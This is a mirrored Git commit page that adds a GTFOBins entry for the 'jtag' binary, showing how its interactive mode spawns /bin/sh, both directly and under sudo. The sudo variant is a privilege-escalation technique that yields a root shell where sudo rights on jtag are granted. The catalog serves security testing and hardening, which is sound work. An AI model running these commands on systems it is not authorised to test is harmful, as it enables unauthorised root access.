1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
This commit is contained in:
Miguel R 2022-07-13 10:25:55 +02:00 committed by GitHub
parent a91775b84a
commit e9306c73da
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

11
_gtfobins/jtag.md Normal file
View File

@ -0,0 +1,11 @@
---
functions:
shell:
- code: |
jtag --interactive
shell /bin/sh
sudo:
- code: |
sudo jtag --interactive
shell /bin/sh
---